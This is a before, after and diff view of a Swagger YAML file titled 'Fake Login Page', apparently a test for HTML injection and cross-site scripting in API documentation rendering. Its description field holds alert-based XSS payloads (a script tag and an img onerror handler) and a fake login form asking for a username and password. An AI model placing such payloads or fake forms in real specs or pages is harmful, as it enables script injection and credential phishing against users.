test2.yaml (before)
swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection : Fake Login xss</h1>
        <i>test VT Miring</i><b> test VT Bold </b> <font size="7" color="red">test VT Size FONT </font><br> <script>alert('XSSS')</script> <img src=x onerror=alert("XSSH")>
        <h1>HTML Injection SENEREX : Fake Login</h1>
    </div>
    <div class="form-container">
        <form action="https://example.com/login" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful

test2.yaml (after)
swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection : Fake Login xs</h1>
        <img src=x onerror=alert("XSSH")>
        <h1>HTML Injection SENEREX : Fake Login</h1>
    </div>
    <div class="form-container">
        <form action="https://example.com/login" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" name="username" size="20">
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" name="password" size="20">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
    </div>
</div>'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful

test2.yaml (diff)
@@ -4,8 +4,8 @@ info:
   title: Fake Login Page
   description: '<div class="login-form">
     <div class="heading">
-        <h1>HTML Injection : Fake Login xss</h1>
-        <i>test VT Miring</i><b> test VT Bold </b> <font size="7" color="red">test VT Size FONT </font><br> <script>alert('XSSS')</script> <img src=x onerror=alert("XSSH")>
+        <h1>HTML Injection : Fake Login xs</h1>
+        <img src=x onerror=alert("XSSH")>
         <h1>HTML Injection SENEREX : Fake Login</h1>
     </div>
     <div class="form-container">
